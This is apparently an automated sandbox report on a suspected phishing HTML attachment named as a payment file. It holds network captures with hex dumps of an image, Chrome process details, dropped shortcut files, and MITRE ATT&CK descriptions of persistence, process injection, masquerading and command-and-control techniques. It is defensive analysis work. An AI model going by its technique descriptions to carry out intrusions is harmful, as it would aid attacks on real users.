2025-01-02 09:28:34 UTC	677	OUT	GET /img/b/R29vZ2xl/AVvXsEh-3vBlwryYM-nViujdAgEHoxOEPnBH93ECZB9TD7s6RP4K82VxMGwK5IE25cXnzwGDfx2tEnAiZBfzgYML-pfkuxpvqP72-v0eFpETk20PZCVhHnQOaGa2XQ7_XEEkfvlBt-DyP8340HFGybdoWWh9Ai54XC0uZoP7hPIjO49whnc1qFk5MX5UqRrvkId8/s2160/image.png HTTP/1.1 Host: blogger.googleusercontent.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / X-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlaHLAQiFoM0BCOnFzQEIucrNAQiK080BGI/OzQEYwtjNARjrjaUX Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-02 09:28:34 UTC	465	IN	HTTP/1.1 200 OK Content-Type: image/png Vary: Origin Access-Control-Expose-Headers: Content-Length ETag: "v16b" Expires: Fri, 03 Jan 2025 09:28:34 GMT Cache-Control: public, max-age=86400, no-transform Content-Disposition: inline;filename="image.png" X-Content-Type-Options: nosniff Date: Thu, 02 Jan 2025 09:28:34 GMT Server: fife Content-Length: 52776 X-XSS-Protection: 0 Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2025-01-02 09:28:34 UTC	925	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 08 70 00 00 08 70 08 02 00 00 00 c0 ae cc 3e 00 00 00 03 73 42 49 54 08 08 08 db e1 4f e0 00 00 00 5f 7a 54 58 74 52 61 77 20 70 72 6f 66 69 6c 65 20 74 79 70 65 20 41 50 50 31 00 00 08 99 e3 4a 4f cd 4b 2d ca 4c 56 28 28 ca 4f cb cc 49 e5 52 00 03 63 13 2e 13 4b 13 4b a3 44 03 03 03 0b 03 08 30 34 30 30 36 04 92 46 40 b6 39 54 28 d1 00 05 98 98 9b a5 01 a1 b9 59 b2 99 29 88 cf 05 00 4f ba 15 68 1b 2d d8 8c 00 00 20 00 49 44 41 54 78 9c ec dd 41 6c d6 f7 7d c7 f1 07 62 07 ec 4c cf e3 ec 89 c6 b3 0e fc 98 68 a3 5a 23 ec a7 5b aa 15 84 e1 69 a7 69 a9 64 84 a5 6d 6a 17 2c e1 9c 12 95 4a 45 3b b4 52 72 f1 25 3d e4 e4 4a a5 2a 87 a9 8e 44 b4 e6 e6 ca 48 e5 12 d5 04 b6 44 4b 0f c6 28 95 9a 43 b0 0d 9b 1c 69 Data Ascii: PNGIHDRpp>sBITO_zTXtRaw profile type APP1JOK-LV((OIRc.KKD04006F@9T(Y)Oh- IDATxAl}bLhZ#[iidmj,JE;Rr%=J*DHDK(Ci
2025-01-02 09:28:34 UTC	1390	IN	Data Raw: 01 00 00 00 00 00 08 08 2a 00 00 00 00 00 00 01 41 05 00 00 00 00 00 20 20 a8 00 00 00 00 00 00 04 04 15 00 00 00 00 00 80 80 a0 02 00 00 00 00 00 10 10 54 00 00 00 00 00 00 02 82 0a 00 00 00 00 00 40 40 50 01 00 00 00 00 00 08 08 2a 00 00 00 00 00 00 01 41 05 00 00 00 00 00 20 20 a8 00 00 00 00 00 00 04 04 15 00 00 00 00 00 80 80 a0 02 00 00 00 00 00 10 10 54 00 00 00 00 00 00 02 82 0a 00 00 00 00 00 40 40 50 01 00 00 00 00 00 08 08 2a 00 00 00 00 00 00 01 41 05 00 00 00 00 00 20 20 a8 00 00 00 00 00 00 04 04 15 00 00 00 00 00 80 80 a0 02 00 00 00 00 00 10 10 54 00 00 00 00 00 00 02 82 0a 00 00 00 00 00 40 40 50 01 00 00 00 00 00 08 08 2a 00 00 00 00 00 00 01 41 05 00 00 00 00 00 20 20 a8 00 00 00 00 00 00 04 04 15 00 00 00 00 00 80 80 a0 02 00 00 00 00 Data Ascii: A T@@PA T@@PA T@@PA
2025-01-02 09:28:34 UTC	1390	IN	Data Raw: 00 00 00 00 00 01 41 05 00 00 00 00 00 20 20 a8 00 00 00 00 00 00 04 04 15 00 00 00 00 00 80 80 a0 02 00 00 00 00 00 10 10 54 00 00 00 00 00 00 02 82 0a 00 00 00 00 00 40 40 50 01 00 00 00 00 00 08 08 2a 00 00 00 00 00 00 01 41 05 00 00 00 00 00 20 20 a8 00 00 00 00 00 00 04 04 15 00 00 00 00 00 80 80 a0 02 00 00 00 00 00 10 10 54 00 00 00 00 00 00 02 82 0a 00 00 00 00 00 40 40 50 01 00 00 00 00 00 08 08 2a 00 00 00 00 00 00 01 41 05 00 00 00 00 00 20 20 a8 00 00 00 00 00 00 04 04 15 00 00 00 00 00 80 80 a0 02 00 00 00 00 00 10 10 54 00 00 00 00 00 00 02 82 0a 00 00 00 00 00 40 40 50 01 00 00 00 00 00 08 08 2a 00 00 00 00 00 00 01 41 05 00 00 00 00 00 20 20 a8 00 00 00 00 00 00 04 04 15 00 00 00 00 00 80 80 a0 02 00 00 00 00 00 10 10 54 00 00 00 00 00 00 Data Ascii: A T@@PA T@@PA T@@P*A T
2025-01-02 09:28:34 UTC	1390	IN	Data Raw: 00 00 00 20 20 a8 00 00 00 00 00 00 04 04 15 00 00 00 00 00 80 80 a0 02 00 00 00 00 00 10 10 54 00 00 00 00 00 00 02 82 0a 00 00 00 00 00 40 40 50 01 00 00 00 00 00 08 08 2a 00 00 00 00 00 00 01 41 05 00 00 00 00 00 20 20 a8 00 00 00 00 00 00 04 04 15 00 00 00 00 00 80 80 a0 02 00 00 00 00 00 10 10 54 00 00 00 00 00 00 02 82 0a 00 00 00 00 00 40 40 50 01 00 00 00 00 00 08 08 2a 00 00 00 00 00 00 01 41 05 00 00 00 00 00 20 20 a8 00 00 00 00 00 00 04 04 15 00 00 00 00 00 80 80 a0 02 00 00 00 00 00 10 10 54 00 00 00 00 00 00 02 82 0a 00 00 00 00 00 40 40 50 01 00 00 00 00 00 08 08 2a 00 00 00 00 00 00 01 41 05 00 00 00 00 00 20 20 a8 00 00 00 00 00 00 04 04 15 00 00 00 00 00 80 80 a0 02 00 00 00 00 00 10 10 54 00 00 00 00 00 00 02 82 0a 00 00 00 00 00 40 40 Data Ascii: T@@PA T@@PA T@@P*A T@@
2025-01-02 09:28:34 UTC	1390	IN	Data Raw: e1 ba 9a 92 63 e5 53 67 34 15 00 00 e0 d1 09 2a 00 00 f0 29 8a 83 b5 13 3f f9 a9 9a 92 6f c5 e3 43 a7 df 99 2b 0e d6 52 0f 01 00 00 32 40 50 01 00 80 4f da bc e9 2b f5 0a f6 42 4f 7f f5 e4 f5 59 4d 05 00 00 08 09 2a 00 00 f0 ff 78 37 a5 d3 74 15 4b 9a 0a 00 00 10 12 54 00 00 e0 ff a8 29 9d 49 53 01 00 00 42 82 0a 00 00 fc 5a 77 a9 4f 4d e9 58 9a 0a 00 00 f0 70 82 0a 00 00 14 0a 85 42 77 a9 ef 84 9a d2 d9 34 15 00 00 e0 21 04 15 00 00 28 14 0a 85 67 df 9c 2e 1e 1f 4a bd 82 c4 34 15 00 00 e0 f7 11 54 00 00 a0 50 bb 32 55 3e 75 26 f5 0a da 82 a6 02 00 00 7c 2a 41 05 00 80 4e 77 64 6c fc f0 f9 0b a9 57 d0 46 36 9b 4a 6f 75 20 f5 10 00 00 a0 8d 08 2a 00 00 74 b4 e2 60 6d e8 07 3f 4c bd 82 b6 d3 55 2c 3d fb a3 e9 ee 52 5f ea 21 00 00 40 bb 10 54 00 00 e8 5c dd Data Ascii: cSg4)?oC+R2@PO+BOYMx7tKT)ISBZwOMXpBw4!(g.J4TP2U>u&\|ANwdlWF6Jou t`m?LU,=R_!@T\
2025-01-02 09:28:34 UTC	1390	IN	Data Raw: f5 00 00 00 68 8d 43 23 a3 a9 27 ec 91 bb df ff ee 3b cf d5 53 9d 7b f8 e0 3b 13 b7 5f 7a 21 c9 47 67 d1 d3 df b8 d4 5d ea 4b bd 02 00 00 68 01 41 05 00 80 3c e8 ad 0e 54 46 ce a5 5e b1 17 6e bf f4 c2 fb df ba 94 76 c3 bd ab 53 6f 9f fc fc 46 b3 91 76 46 26 74 15 4b 47 2f 26 fe f3 02 00 00 5a 42 50 01 00 20 0f 3a e1 78 ca 46 b3 71 fb a5 17 ee 5d 9d 4a 3d a4 50 28 14 9a f3 73 ff f6 5c 5d 53 79 14 0e a9 00 00 40 3e 08 2a 00 00 e4 c1 91 b1 f1 d4 13 76 dd 7b 5f 1d 6d 93 9a b2 a9 39 3f f7 de 57 f3 df b1 76 ce 21 15 00 00 c8 07 41 05 00 80 cc eb ad 0e 14 8f 0f a5 5e b1 bb 6e bf f4 42 1b be 6d be 72 73 d6 7b 2a 8f c2 21 15 00 00 c8 81 c7 9e 7f 3c f5 04 00 00 d8 99 a3 17 2f 95 87 eb a9 57 ec a2 f6 b9 e9 eb 77 35 e7 e7 ba fb 9e 7c f2 0b 5f 4c 3d a4 ad ed 3f 70 f0 Data Ascii: hC#';S{;_z!Gg]KhA<TF^nvSoFvF&tKG/&ZBP :xFq]J=P(s\]Sy@>v{_m9?Wv!A^nBmrs{!</Ww5\|_L=?p
2025-01-02 09:28:34 UTC	1390	IN	Data Raw: 00 6d 4c 50 01 00 20 33 ca a7 ce a4 9e d0 32 1d f5 80 ca 26 ef d2 87 7a fa ab bd f9 aa 86 00 00 90 27 82 0a 00 00 d9 90 b3 7f 68 ee a8 e3 29 9b d6 3a 2c 20 6d cf 21 87 54 00 00 a0 5d 09 2a 00 00 64 43 4f ff 40 ea 09 ad d4 81 c7 35 3a ed 44 ce f6 78 46 05 00 00 da 96 a0 02 00 40 36 e4 ec 1f 9a 3b f0 84 4a f3 4e c7 35 a4 6d a8 8c 9c 4b 3d 01 00 00 f8 74 82 0a 00 00 d9 d0 dd d7 97 7a 42 2b 35 3b ef 84 ca fa ea 6a ea 09 d9 90 b3 76 08 00 00 b9 21 a8 00 00 90 0d c5 c1 5a ea 09 2d b3 72 eb 46 ea 09 09 74 e0 a1 9c ed a9 9c f5 8c 0a 00 00 b4 23 41 05 00 80 6c 28 e5 28 a8 74 e0 f1 14 1e 9d 13 2a 00 00 d0 9e 04 15 00 00 b2 a1 ab 58 4a 3d a1 65 3a 36 a8 34 ef dc 4e 3d 21 03 8a c7 87 ba 4b b9 ba e0 0e 00 00 f2 41 50 01 00 20 03 72 f6 7f f6 1f 2c 2e a4 9e 90 c6 7a c3 Data Ascii: mLP 32&z'h):, m!T]dCO@5:DxF@6;JN5mK=tzB+5;jv!Z-rFt#Al((tXJ=e:64N=!KAP r,.z
2025-01-02 09:28:34 UTC	1390	IN	Data Raw: b3 8e d0 00 00 40 18 85 0a 00 00 40 1a 8a 2b 2b d1 11 00 00 a0 b9 14 2a 00 00 00 00 00 00 a7 50 a8 00 00 00 55 b0 f2 0b 00 00 48 9a 42 05 00 00 20 0d 1d 2b bf 00 00 20 8e 42 05 00 00 aa e0 fa 85 83 ea 17 37 55 74 a2 23 00 00 40 73 29 54 00 00 a0 0a ed 4e d3 eb 04 95 12 00 00 90 34 85 0a 00 00 00 00 00 c0 29 14 2a 00 00 40 15 dc ff 28 c5 4c b7 17 1d 01 00 00 1a 4a a1 02 00 00 54 c1 fd 8f 52 4c 2f f6 a2 23 00 00 40 43 29 54 00 00 a8 af a3 bd dd e8 08 94 c3 09 19 00 00 20 75 0a 15 00 00 ea eb b0 bf 1b 1d 81 72 b8 48 0f 00 00 a4 4e a1 02 00 00 00 00 00 70 0a 85 0a 00 00 54 a1 3d db e8 9d 57 73 57 af 45 47 00 00 00 b8 10 85 0a 00 00 54 a1 58 b2 f3 8a 12 a8 a6 00 00 20 8a 42 05 00 00 98 b8 99 6e 2f 3a 02 00 00 c0 85 28 54 00 00 80 89 9b 56 a8 00 00 00 89 53 a8 Data Ascii: @@++PUHB + B7Ut#@s)TN4)@(LJTRL/#@C)T urHNpT=WsWEGTX Bn/:(TVS
2025-01-02 09:28:34 UTC	1390	IN	Data Raw: a3 9d 67 d1 11 ca 31 b7 ba 16 1d 61 22 e6 3e b8 16 1d 01 00 00 60 22 14 2a 00 00 a4 e4 78 78 10 1d a1 34 59 6e c7 9a c9 f4 36 4c 1d 64 d3 26 02 00 40 a2 14 2a 00 00 a4 64 f0 78 33 3a 42 69 f2 bb 4b df ee cc 4e 2f 76 a3 53 64 2b a7 36 11 00 00 52 a4 50 01 00 20 25 39 dd a5 9f bb 7a 2d 3a 42 c9 8a 2b 0e a8 00 00 00 d9 52 a8 00 00 90 12 77 e9 eb 2c bf 8a a8 56 8e 32 fa f0 03 00 40 8a 14 2a 00 00 a4 64 b4 bd 15 1d a1 34 f9 cd 73 64 79 15 a6 3e 72 6a 13 01 00 20 45 0a 15 00 00 52 92 d3 19 89 4e 76 85 4a 7e 15 11 00 00 c0 af 28 54 00 00 48 cc e0 e9 a3 e8 08 e5 98 2a 3a ed 4e 56 5b bf 8a a5 e5 e8 08 39 1b ed e4 33 9e 05 00 00 29 52 a8 00 00 90 98 9c 2e 49 e4 34 d2 e1 80 ca a4 1d 1f e4 33 9e 05 00 00 29 52 a8 00 00 90 98 9c 2e 49 e4 54 42 38 a0 02 00 00 e4 4d a1 Data Ascii: g1a">`"xx4Yn6Ld&@dx3:BiKN/vSd+6RP %9z-:B+Rw,V2@d4sdy>rj ERNvJ~(TH:NV[93)R.I43)R.ITB8M
2025-01-02 09:28:34 UTC	1390	IN	Data Raw: 9c 86 54 a6 17 bb 33 dd 5e 74 8a 97 14 57 56 a6 8a 4e 74 8a a6 18 3c de 8c 8e 00 00 00 bc 44 a1 02 00 40 3e 72 2a 54 5a f5 1b 52 a9 5b 9e bc b9 48 0f 00 00 75 a3 50 01 00 20 1f a3 ed ad e8 08 65 aa 5b 81 51 b7 3c 79 73 91 1e 00 00 ea 46 a1 02 00 40 3e 0e fb bb 47 7b fd e8 14 a5 a9 5b 81 e1 80 4a 95 32 6b 07 01 00 20 03 0a 15 00 00 b2 92 d3 d6 af 5a 9d 51 99 e9 f6 a6 17 bb d1 29 9a e2 64 34 74 94 1e 00 00 ea 46 a1 02 00 40 56 86 79 7d af bf 3e 43 2a f5 49 d2 04 99 7d 8c 01 00 20 0f 0a 15 00 00 b2 92 d3 84 4a ab d5 7a e7 fa 8d e8 08 2f 28 54 aa 64 df 17 00 00 d4 90 42 05 00 80 ac 8c b6 b7 4e 46 c3 e8 14 a5 79 fb 83 6b d1 11 5e 28 1c 50 a9 d0 f1 81 7d 5f 00 00 50 3b 0a 15 00 00 72 f3 f5 e3 cd e8 08 a5 99 2a 3a 75 68 32 da 9d d9 62 69 39 3a 45 83 64 36 68 05 Data Ascii: T3^tWVNt<D@>rTZR[HuP e[Q<ysF@>G{[J2k ZQ)d4tF@Vy}>CI} Jz/(TdBNFyk^(P}_P;r*:uh2bi9:Ed6h

Target ID:	0
Start time:	04:28:27
Start date:	02/01/2025
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "C:\Users\user\Desktop\Payment_00372_26-12-2024.html"
Imagebase:	0x7ff715980000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	2
Start time:	04:28:30
Start date:	02/01/2025
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2116 --field-trial-handle=1956,i,15699976951531036883,5928165152567565084,262144 /prefetch:8
Imagebase:	0x7ff715980000
File size:	3'242'272 bytes
MD5 hash:	45DE480806D1B5D462A7DDE4DCEFC4E4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Chronological Activities

Disassembly

⊘No disassembly

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Payment_00372_26-12-2024.html

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

Phishing

Compliance

Networking

System Summary

Boot Survival

Stealing of Sensitive Information

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

LLM Input / Output

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk

Chrome Cache Entry: 87

Chrome Cache Entry: 88

Static File Info

General

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTPS Proxied Packets

Statistics

CPU Usage

Memory Usage

Behavior

System Behavior

Analysis Process: chrome.exePID: 5884, Parent PID: 5664

General

Chronological Activities

Windows Analysis Report
Payment_00372_26-12-2024.html